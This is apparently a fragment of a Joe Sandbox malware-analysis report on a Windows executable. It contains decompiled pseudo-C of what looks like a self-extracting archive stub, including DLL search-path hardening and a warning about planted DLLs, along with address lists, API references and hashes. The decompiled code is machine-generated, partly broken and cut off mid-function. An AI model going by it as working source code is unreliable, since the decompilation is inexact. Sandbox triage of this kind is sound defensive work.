					return E00A50320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
				}
			}

0x00a46ce6
0x00a46ce8
0x00a46cf6
0x00a46cfe
0x00a46d01
0x00a46d03
0x00a46d09
0x00a46d2c
0x00a46d0b
0x00a46d0b
0x00a46d0d
0x00a46d0d
0x00a46d10
0x00a46d16
0x00a46d17
0x00a46d1c
0x00a46d26
0x00a46d2a
0x00a46d3b
0x00a46d4b
0x00a46d54
0x00a46d5b
0x00a46d5e
0x00a46d62
0x00a46d64
0x00a46d68
0x00a46d6c
0x00a46d6c
0x00a46d6c
0x00a46d6e
0x00a46d72
0x00a46d72
0x00a46d7e
0x00a46d84
0x00a46d85
0x00a46d8a
0x00a46d90
0x00000000
0x00000000
0x00a46d96
0x00a46d98
0x00a46d9c
0x00a46da4
0x00a46db4
0x00000000
0x00000000
0x00a46dba
0x00a46dbd
0x00a46dbf
0x00a46dc3
0x00a46dc7
0x00a46dc9
0x00a46dc9
0x00a46dcf
0x00a46dcf
0x00a46dd1
0x00a46dd5
0x00a46dd8
0x00a46dda
0x00a46de5
0x00a46de5
0x00a46de8
0x00a46dea
0x00000000
0x00000000
0x00a46dec
0x00a46dec
0x00a46e2d
0x00a46e32
0x00a46e32
0x00a46e35
0x00a46e3f
0x00a46e49
0x00a46e4f
0x00a46e80
0x00a46e85
0x00a46e96
0x00a46e9d
0x00a46e90
0x00a46e90
0x00a46e90
0x00a46eb0
0x00a46eb2
0x00a46eb3
0x00a46eb7
0x00a46ebd
0x00a46ec3
0x00a46ec7
0x00a46ec9
0x00a46ed6
0x00a46edb
0x00a46edf
0x00a46ee1
0x00a46dd8
0x00a46dda
0x00a46de5
0x00a46de5
0x00a46de8
0x00a46dea
0x00000000
0x00000000
0x00a46dea
0x00a46edf
0x00a46ed6
0x00a46e51
0x00a46e51
0x00a46e52
0x00a46e55
0x00a46e60
0x00a46eea
0x00a46e75
0x00a46e75
0x00a46e79
0x00000000
0x00a46e79
0x00a46e60
0x00000000
0x00a46df4
0x00a46dfc
0x00a46e03
0x00a46e03
0x00a46e08
0x00a46e0b
0x00a46e0b
0x00a46e0f
0x00a46e11
0x00a46e17
0x00a46e1d
0x00a46e23
0x00a46e26
0x00a46e29
0x00000000
0x00a46e29
0x00000000
0x00a46e17
0x00a46eef
0x00a46eef
0x00a46efc
0x00a46efe
0x00a46f03
0x00a46f05
0x00a46f07
0x00a46f07
0x00a46f07
0x00a46f08
0x00a46f0a
0x00a46f0c
0x00a46f0e
0x00a46f12
0x00a46f14
0x00a46f14
0x00a46f1a
0x00a46f1e
0x00a46f22
0x00a46f26
0x00a46f26
0x00a46f28
0x00a46f2d
0x00a46f35
0x00a46f37
0x00a46f39
0x00a46f3b
0x00a46f3d
0x00a46f3d
0x00a46f3f
0x00a46f44
0x00a46f47
0x00a46f5c
0x00a46f49
0x00a46f4c
0x00a46f4c
0x00a46f65
0x00a46f67
0x00a46f6b
0x00a46f6f
0x00a46f73
0x00a46f73
0x00a46f79
0x00a46f79
0x00a46f7d
0x00a46f81
0x00a46f83
0x00a470eb
0x00000000
0x00a46f89
0x00a46f8c
0x00a46f91
0x00a46f93
0x00a46f95
0x00a4700b
0x00a4700b
0x00a47010
0x00a47016
0x00a4701c
0x00a4701e
0x00a47024
0x00a470ca
0x00a470cc
0x00a470ce
0x00a470d3
0x00a470d8
0x00a470dd
0x00a470dd
0x00a470e0
0x00a470e4
0x00000000
0x00a470e4
0x00a4702a
0x00a4702a
0x00a4702e
0x00a47030
0x00a47032
0x00000000
0x00a47038
0x00a46dbd
0x00a46dbf
0x00a46dc3
0x00a46dc7
0x00a46dc9
0x00a46dc9
0x00000000
0x00a46dc9
0x00a47032
0x00a47024
0x00a46f97
0x00a46f97
0x00a46f97
0x00a46f99
0x00a46f9d
0x00a46fa3
0x00a46fa5
0x00a46fac
0x00a46fc7
0x00a46fca
0x00a46fcf
0x00a46fd1
0x00000000
0x00000000
0x00a46fae
0x00a46fb1
0x00a46fb6
0x00a46fb8
0x00a46fbe
0x00a46fc5
0x00a46fd7
0x00a46fd7
0x00a46fde
0x00a46fe4
0x00a46feb
0x00a47040
0x00a47045
0x00a47048
0x00a4704a
0x00a47050
0x00a47057
0x00a4705b
0x00a47063
0x00a47069
0x00a4706c
0x00a47070
0x00a47077
0x00a4707b
0x00a4707e
0x00a47080
0x00a4708c
0x00a4709b
0x00a470a0
0x00a470a4
0x00a470a9
0x00a470b1
0x00a470b7
0x00a470bb
0x00a470bb
0x00a470c2
0x00a470c4
0x00a470ef
0x00a470ef
0x00000000
0x00a470ef
0x00a46fed
0x00a46fed
0x00a46ff1
0x00000000
0x00000000
0x00a46ff1
0x00a46feb
0x00000000
0x00000000
0x00000000
0x00a46fc5
0x00a46fb8
0x00000000
0x00a46ff7
0x00a46ffb
0x00a46ffc
0x00a47001
0x00a47005
0x00a47005
0x00000000
0x00a46f9d
0x00a46f95
0x00000000
0x00a46f83
0x00a46dba
0x00a470f3
0x00a470f3
0x00a470f3
0x00a470f8
0x00000000
0x00000000
0x00a470f8
0x00a46da4
0x00000000
0x00a46d9c
0x00a470fe
0x00a47106
0x00a47109
0x00a4710e
0x00a47122
0x00a47128
0x00a47132
0x00a47150
0x00a47150

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5493cc86b821eb9078e96e9412ada0e43a2fdefacb9f95a196f0345e8354a51c
Instruction ID: 1d3908959f826ca6debc41b1fbc68a0294a8288b57f6a14f4b4c7ff792af3b52
Opcode Fuzzy Hash: 5493cc86b821eb9078e96e9412ada0e43a2fdefacb9f95a196f0345e8354a51c
Instruction Fuzzy Hash: 76D1B4B9A083818FDB14CF28C94575BBBE1BFC9318F08456DE8899B242D774E909CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00A40863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00A40863(void* __edx, char _a3, long _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t111;
				int _t122;
				long _t133;
				void* _t149;
				_Unknown_base(*)()* _t168;
				struct _OVERLAPPED* _t174;
				struct _OVERLAPPED* _t175;
				signed char _t176;
				_Unknown_base(*)()* _t177;
				struct _OVERLAPPED* _t189;
				long _t190;
				void* _t191;
				_Unknown_base(*)()* _t192;
				struct HINSTANCE__* _t193;
				signed int _t195;
				struct _OVERLAPPED* _t196;
				signed int _t197;
				void* _t198;
				_Unknown_base(*)()* _t199;
				signed int _t200;
				int _t201;
				void* _t202;

				E00A4EC50(0xb3cc);
				_t174 = 0;
				_a3 = 0;
				_t193 = GetModuleHandleW(L"kernel32");
				if(_t193 != 0) {
					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
					_t176 = _a46032;
					_t192 = _t168;
					if(_t192 != 0) {
						asm("sbb ecx, ecx");
						_t177 = _t192;
						 *0xa63278( ~(_t176 & 0x000000ff) & 0x00a635f4);
						 *_t192();
					}
					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
					if(_t199 != 0) {
						_t177 = _t199;
						 *0xa63278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
						 *_t199();
						_v1 = 1;
					}
					_t174 = 0;
				}
				_t111 =  *0xa6e1a4; // 0xa63c2c
				_t201 = _t200 | 0xffffffff;
				_a8 = L"version.dll";
				_t194 = 0x800;
				_a12 = L"DXGIDebug.dll";
				_a16 = L"sfc_os.dll";
				_a20 = L"SSPICLI.DLL";
				_a24 = L"rsaenh.dll";
				_a28 = L"UXTheme.dll";
				_a32 = L"dwmapi.dll";
				_a36 = L"cryptbase.dll";
				_a40 = L"lpk.dll";
				_a44 = L"usp10.dll";
				_a48 = L"clbcatq.dll";
				_a52 = L"comres.dll";
				_a56 = L"ws2_32.dll";
				_a60 = L"ws2help.dll";
				_a64 = L"psapi.dll";
				_a68 = L"ieframe.dll";
				_a72 = L"ntshrui.dll";
				_a76 = L"atl.dll";
				_a80 = L"setupapi.dll";
				_a84 = L"apphelp.dll";
				_a88 = L"userenv.dll";
				_a92 = L"netapi32.dll";
				_a96 = L"shdocvw.dll";
				_a100 = L"crypt32.dll";
				_a104 = L"msasn1.dll";
				_a108 = L"cryptui.dll";
				_a112 = L"wintrust.dll";
				_a116 = L"shell32.dll";
				_a120 = L"secur32.dll";
				_a124 = L"cabinet.dll";
				_a128 = L"oleaccrc.dll";
				_a132 = L"ntmarta.dll";
				_a136 = L"profapi.dll";
				_a140 = L"WindowsCodecs.dll";
				_a144 = L"srvcli.dll";
				_a148 = L"cscapi.dll";
				_a152 = L"slc.dll";
				_a156 = L"imageres.dll";
				_a160 = L"dnsapi.DLL";
				_a164 = L"iphlpapi.DLL";
				_a168 = L"WINNSI.DLL";
				_a172 = L"netutils.dll";
				_a176 = L"mpr.dll";
				_a180 = L"devrtl.dll";
				_a184 = L"propsys.dll";
				_a188 = L"mlang.dll";
				_a192 = L"samcli.dll";
				_a196 = L"samlib.dll";
				_a200 = L"wkscli.dll";
				_a204 = L"dfscli.dll";
				_a208 = L"browcli.dll";
				_a212 = L"rasadhlp.dll";
				_a216 = L"dhcpcsvc6.dll";
				_a220 = L"dhcpcsvc.dll";
				_a224 = L"XmlLite.dll";
				_a228 = L"linkinfo.dll";
				_a232 = L"cryptsp.dll";
				_a236 = L"RpcRtRemote.dll";
				_a240 = L"aclui.dll";
				_a244 = L"dsrole.dll";
				_a248 = L"peerdist.dll";
				if( *_t111 == 0x78) {
					L15:
					GetModuleFileNameW(_t174,  &_a772, _t194);
					E00A40602( &_a9160, E00A3C29A(_t215,  &_a772), _t194);
					_t189 = _t174;
					do {
						_t195 = _t174;
						if(E00A3B146() < 0x600) {
							L19:
							_t196 =  *(_t202 + 0x18 + _t195 * 4);
							_push(0x800);
							E00A3C310(_t218,  &_a772, _t196);
							_t122 = GetFileAttributesW( &_a760); // executed
							if(_t122 != _t201) {
								_t189 = _t196;
								L23:
								if(_v1 != 0) {
									L29:
									_t225 = _t189;
									if(_t189 == 0) {
										return _t122;
									}
									E00A3C2E4(_t225,  &_a768);
									if(E00A3B146() < 0x600) {
										_push( &_a9160);
										_push( &_a768);
										E00A34092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
										_t202 = _t202 + 0x18;
										_t122 = AllocConsole();
										__eflags = _t122;
										if(_t122 != 0) {
											__imp__AttachConsole(GetCurrentProcessId());
											_t133 = E00A53E13( &_a4860);
											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
											Sleep(0x2710);
											_t122 = FreeConsole();
										}
									} else {
										E00A4081B(L"dwmapi.dll");
										E00A4081B(L"uxtheme.dll");
										_push( &_a9152);
										_push( &_a760);
										E00A34092( &_a4852, 0x864, E00A3E617(0xf1), _t189);
										_t202 = _t202 + 0x18;
										_t122 = E00A4A7E4(0,  &_a4848, E00A3E617(0xf0), 0x30);
									}
									ExitProcess(0);
								}
								_t197 = 0;
								while(1) {
									_t175 =  *(_t202 + 0x38 + _t197 * 4);
									_push(0x800);
									E00A3C310(0,  &_a768, _t175);
									_t122 = GetFileAttributesW( &_a756);
									if(_t122 != _t201) {
										break;
									}
									_t197 = _t197 + 1;
									if(_t197 < 0x35) {
										continue;
									}
									goto L29;
								}
								_t189 = _t175;
								goto L29;
							}
							goto L20;
						}
						_t149 = E00A4081B( *(_t202 + 0x18 + _t195 * 4)); // executed
						if(_t149 == 0) {
							goto L19;
						}
						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
						_t218 = _t122 - 2;
						if(_t122 != 2) {
							goto L20;
						}
						goto L19;
						L20:
						_t174 =  &(_t174->Internal);
					} while (_t174 < 8);
					goto L23;
				} else {
					_t190 = E00A575FB(_t177, _t111);
					if(_t190 == 0) {
						goto L15;
					}
					GetModuleFileNameW(_t174,  &_a4868, 0x800);
					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190 || ReadFile(_t198,  &_a13260, 0x7ffe,  &_a4, _t174) == 0) {
						L14:
						CloseHandle(_t198);
						_t194 = 0x800;
						goto L15;
					} else {
						_push(0x104);
						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t191 = E00A40371();
							_t215 = _t191;
							if(_t191 == 0) {
								goto L14;
							}
							E00A4081B( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t191);
						}
						goto L14;
					}
				}
			}

0x00a40868
0x00a40871
0x00a40878
0x00a40882
0x00a40886
0x00a4088e
0x00a40894
0x00a4089b
0x00a4089f
0x00a408a6
0x00a408af
0x00a408b1
0x00a408b7
0x00a408b7
0x00a408c5
0x00a408c9
0x00a408d6
0x00a408d8
0x00a408de
0x00a408e0
0x00a408e0
0x00a408e5
0x00a408e5
0x00a408e7
0x00a408ec
0x00a408ef
0x00a408f7
0x00a408fc
0x00a40904
0x00a4090f
0x00a40917
0x00a4091f
0x00a40927
0x00a4092f
0x00a40937
0x00a4093f
0x00a40947
0x00a4094f
0x00a40957
0x00a4095f
0x00a40967
0x00a4096f
0x00a40977
0x00a4097f
0x00a40987
0x00a4098f
0x00a40997
0x00a4099f
0x00a409a7
0x00a409af
0x00a409b7
0x00a409bf
0x00a409c7
0x00a409d2
0x00a409dd
0x00a409e8
0x00a409f3
0x00a409fe
0x00a40a09
0x00a40a14
0x00a40a1f
0x00a40a2a
0x00a40a35
0x00a40a40
0x00a40a4b
0x00a40a56
0x00a40a61
0x00a40a6c
0x00a40a77
0x00a40a82
0x00a40a8d
0x00a40a98
0x00a40aa3
0x00a40aae
0x00a40ab9
0x00a40ac4
0x00a40acf
0x00a40ada
0x00a40ae5
0x00a40af0
0x00a40afb
0x00a40b06
0x00a40b11
0x00a40b1c
0x00a40b27
0x00a40b32
0x00a40b3d
0x00a40b48
0x00a40c14
0x00a40c1e
0x00a40c3b
0x00a40c40
0x00a40c42
0x00a40c42
0x00a40c4e
0x00a40c7d
0x00a40c7d
0x00a40c88
0x00a40c8f
0x00a40c9c
0x00a40ca4
0x00a40cae
0x00a40cb0
0x00a40cb5
0x00a40cec
0x00a40cec
0x00a40cee
0x00a40e05
0x00a40e05
0x00a40cfc
0x00a40d0b
0x00a40d7a
0x00a40d82
0x00a40d96
0x00a40d9b
0x00a40d9e
0x00a40da4
0x00a40da6
0x00a40daf
0x00a40dc4
0x00a40ddc
0x00a40de7
0x00a40ded
0x00a40ded
0x00a40d0d
0x00a40d12
0x00a40d1c
0x00a40d28
0x00a40d30
0x00a40d4a
0x00a40d4f
0x00a40d69
0x00a40d69
0x00a40df5
0x00a40df5
0x00a40cb7
0x00a40cb9
0x00a40cb9
0x00a40cc4
0x00a40ccb
0x00a40cd8
0x00a40ce0
0x00000000
0x00000000
0x00a40ce2
0x00a40ce6
0x00000000
0x00000000
0x00000000
0x00a40ce8
0x00a40cea
0x00000000
0x00a40cea
0x00000000
0x00a40ca4
0x00a40c54
0x00a40c5b
0x00000000
0x00000000
0x00a40c72
0x00a40c78
0x00a40c7b
0x00000000
0x00000000
0x00000000
0x00a40ca6
0x00a40ca6
0x00a40ca7
0x00000000
0x00a40b4e
0x00a40b54
0x00a40b59
0x00000000
0x00000000
0x00a40b69
0x00a40b89
0x00a40b8d
0x00a40c08
0x00a40c09
0x00a40c0f
0x00000000
0x00a40bbb
0x00a40bc3
0x00a40bc8
0x00a40bd7
0x00a40bdf
0x00a40bfd
0x00a40c02
0x00a40c04
0x00a40c06
0x00000000
0x00000000
0x00a40bea
0x00a40bef
0x00a40bfb
0x00a40bfc
0x00a40bfc
0x00000000
0x00a40bfd
0x00a40b8d

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00A4087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A4088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A408BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A40B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A40B93
ReadFile.KERNEL32(00000000,?,00007FFE,00A63C7C,00000000), ref: 00A40BB1
CloseHandle.KERNEL32(00000000), ref: 00A40C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A40C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A63C7C,?,00000000,?,00000800), ref: 00A40C72
GetFileAttributesW.KERNELBASE(?,?,00A63C7C,00000800,?,00000000,?,00000800), ref: 00A40C9C
GetFileAttributesW.KERNEL32(?,?,00A63D44,00000800), ref: 00A40CD8

Part of subcall function 00A4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
Part of subcall function 00A4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858

_swprintf.LIBCMT ref: 00A40D4A
_swprintf.LIBCMT ref: 00A40D96

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

AllocConsole.KERNEL32 ref: 00A40D9E
GetCurrentProcessId.KERNEL32 ref: 00A40DA8
AttachConsole.KERNEL32(00000000), ref: 00A40DAF
_wcslen.LIBCMT ref: 00A40DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A40DD5
WriteConsoleW.KERNEL32(00000000), ref: 00A40DDC
Sleep.KERNEL32(00002710), ref: 00A40DE7
FreeConsole.KERNEL32 ref: 00A40DED
ExitProcess.KERNEL32 ref: 00A40DF5

Strings

SetDllDirectoryW, xrefs: 00A40888
SetDefaultDllDirectories, xrefs: 00A408B9
dwmapi.dll, xrefs: 00A40927, 00A40D0D
uxtheme.dll, xrefs: 00A40D17
DXGIDebug.dll, xrefs: 00A408FC, 00A40C5E
kernel32, xrefs: 00A40873
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00A40D84

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 6b23cc84e89b002138f39d891cb2d2323db9a1983a18449f4ee82f556ce2bd8f
Instruction ID: a2ab7ed63aaedf8c9b095e058f79ab2e096e11e01afdc104b7a26e4b2f4b3c7a
Opcode Fuzzy Hash: 6b23cc84e89b002138f39d891cb2d2323db9a1983a18449f4ee82f556ce2bd8f
Instruction Fuzzy Hash: 24D154B2408344ABDB21DFA08949F9FBAF8BB85704F51491DF2859B150C7B5864ECBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DA67 Relevance: 25.2, APIs: 5, Strings: 9, Instructions: 663
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A3DA67(char* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t245;
				void* _t246;
				WCHAR* _t247;
				void* _t252;
				unsigned int _t258;
				signed int _t264;
				signed int _t268;
				void* _t279;
				signed short* _t283;
				void* _t284;
				void* _t290;
				signed short* _t294;
				void* _t295;
				signed int _t299;
				signed int _t303;
				signed int _t318;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				signed int _t333;
				char* _t334;
				signed int _t338;
				short _t341;
				void* _t342;
				signed int _t346;
				char* _t348;
				char* _t350;
				char* _t355;
				void* _t358;
				void* _t360;
				void* _t363;
				signed int _t372;
				char* _t374;
				unsigned int _t385;
				unsigned int _t389;
				signed int _t392;
				signed int _t397;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				char* _t421;
				signed int _t424;
				signed int _t425;
				void* _t430;
				char* _t434;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				char* _t451;
				signed int _t453;
				signed int _t455;
				void* _t456;
				intOrPtr* _t459;
				signed int _t461;
				signed int _t462;
				char* _t463;
				signed int _t466;
				signed int _t467;
				char** _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t478;

				_t443 = __edx;
				_t471 = _t470 - 0x54;
				E00A4EB78(0xa629bd, _t468);
				E00A4EC50(0x41fc);
				_t245 = 0x5c;
				_push(_t245);
				_push(_t468[0x18]);
				_t459 = __ecx;
				_t468[4] = _t245;
				_t468[0xe] = __ecx;
				_t246 = E00A522C6(__ecx);
				_t372 = 0;
				_t475 = _t246;
				_t247 = _t468 - 0x31d0;
				if(_t246 != 0) {
					E00A40602(_t247, _t468[0x18], 0x800);
				} else {
					GetModuleFileNameW(0, _t247, 0x800);
					 *((short*)(E00A3C29A(_t475, _t468 - 0x31d0))) = 0;
					E00A405DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
				}
				E00A39556(_t468 - 0x4208);
				_push(4);
				 *(_t468 - 4) = _t372;
				_push(_t468 - 0x31d0);
				if(E00A398E0(_t468 - 0x4208, _t459) == 0) {
					L125:
					_t252 = E00A3959A(_t468 - 0x4208); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
					__eflags =  &(_t468[0x16]);
					return _t252;
				} else {
					_t447 = _t372;
					_t477 =  *0xa6e720 - _t447; // 0x64
					if(_t477 <= 0) {
						L7:
						E00A56310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E00A3D6E0);
						E00A56310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E00A3D640);
						_t473 = _t471 + 0x20;
						_t468[0x14] = _t372;
						_t448 = _t447 | 0xffffffff;
						_t468[0xf] = _t372;
						while(_t448 == 0xffffffff) {
							_t348 = E00A39E80(_t468 - 0x4208); // executed
							_t468[0x12] = _t348;
							_t350 = E00A39BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
							_t468[0x11] = _t350;
							_t467 = _t372;
							_t24 = _t350 - 0x10; // -16
							_t434 = _t24;
							_t468[0xa] = _t434;
							if(_t434 < 0) {
								L25:
								_t351 = _t468[0x12];
								L26:
								E00A39D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
								_t355 =  &(_t468[0xf][1]);
								_t468[0xf] = _t355;
								__eflags = _t355 - 0x100;
								if(_t355 < 0x100) {
									continue;
								}
								__eflags = _t448 - 0xffffffff;
								if(_t448 == 0xffffffff) {
									goto L125;
								}
								break;
							} else {
								goto L10;
							}
							L12:
							_t363 = E00A56740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
							_t473 = _t473 + 0xc;
							if(_t363 == 0) {
								L24:
								_t351 = _t468[0x12];
								_t448 =  &(_t468[0x12][_t467]);
								goto L26;
							} else {
								_t350 = _t468[0x11];
							}
							L14:
							_t443 = 0x2a;
							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
								L18:
								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
									L21:
									_t467 = _t467 + 1;
									if(_t467 > _t468[0xa]) {
										goto L25;
									} else {
										_t350 = _t468[0x11];
										L10:
										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
											goto L14;
										} else {
											goto L12;
										}
									}
								} else {
									_t358 = E00A56740(_t468 - 0x21ce + _t467, 0xa639c8, 4);
									_t473 = _t473 + 0xc;
									if(_t358 == 0) {
										goto L125;
									}
									goto L21;
								}
							}
							_t439 = _t468 - 0x21cc + _t467;
							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
								_t360 = E00A56088(_t439, L"*messages***", 0xb);
								_t473 = _t473 + 0xc;
								if(_t360 == 0) {
									_t468[0x14] = 1;
									goto L24;
								}
							}
							goto L18;
						}
						asm("cdq");
						E00A39D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
						_push(0x200002);
						_t461 = E00A53E33(_t468 - 0x4208);
						_t468[0x13] = _t461;
						__eflags = _t461;
						if(_t461 == 0) {
							goto L125;
						}
						_t258 = E00A39BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
						__eflags = _t468[0x14];
						_t385 = _t258;
						_t468[0x12] = _t385;
						if(_t468[0x14] == 0) {
							_push(2 + _t385 * 2);
							_t449 = E00A53E33(_t385);
							__eflags = _t449;
							if(_t449 == 0) {
								goto L125;
							}
							_t468[0x12][_t461] = _t372;
							E00A41B84(_t461, _t449,  &(_t468[0x12][1]));
							L00A53E2E(_t461);
							_t389 = _t468[0x12];
							_t461 = _t449;
							_t468[0x13] = _t461;
							L33:
							_t264 = 0x100000;
							__eflags = _t389 - 0x100000;
							if(_t389 <= 0x100000) {
								_t264 = _t389;
							}
							 *((short*)(_t461 + _t264 * 2)) = 0;
							E00A405A7(_t468 - 0x108, 0xa639d0, 0x64);
							_push(0x20002);
							_t450 = E00A53E33(0);
							_t468[0x11] = _t450;
							__eflags = _t450;
							if(_t450 != 0) {
								__eflags = _t468[0x12];
								_t462 = _t372;
								_t392 = _t372;
								_t468[0xc] = _t462;
								_t268 = _t372;
								 *(_t468 - 0x40) = _t372;
								_t468[0xb] = _t392;
								_t468[0x15] = _t268;
								_t468[0xa] = 0x20;
								_t468[0xf] = 9;
								if(_t468[0x12] <= 0) {
									L109:
									__eflags =  *(_t468 - 0x40);
									if( *(_t468 - 0x40) == 0) {
										_t463 = _t468[0xe];
										L122:
										L00A53E2E(_t468[0x13]);
										L00A53E2E(_t468[0x11]);
										_t451 =  &(_t463[0x3c]);
										__eflags = _t463[0x2c] - _t372;
										if(_t463[0x2c] <= _t372) {
											L124:
											 *0xa710b8 = _t463[0x28];
											E00A56310(_t372,  *_t451, _t463[0x40], 4, E00A3D7A0);
											E00A56310(_t372, _t463[0x50], _t463[0x54], 4, E00A3D7D0);
											goto L125;
										} else {
											goto L123;
										}
										do {
											L123:
											E00A3E261(_t451, _t443, _t372);
											E00A3E261( &(_t463[0x50]), _t443, _t372);
											_t372 = _t372 + 1;
											__eflags = _t372 - _t463[0x2c];
										} while (_t372 < _t463[0x2c]);
										goto L124;
									}
									_t468[7] = _t392;
									_t468[8] = E00A58CCE(_t372, _t462, _t468 - 0x40);
									_pop(_t397);
									__eflags = _t462;
									if(_t462 == 0) {
										L118:
										 *(_t450 + _t462 * 2) = 0;
										_t279 = 0x22;
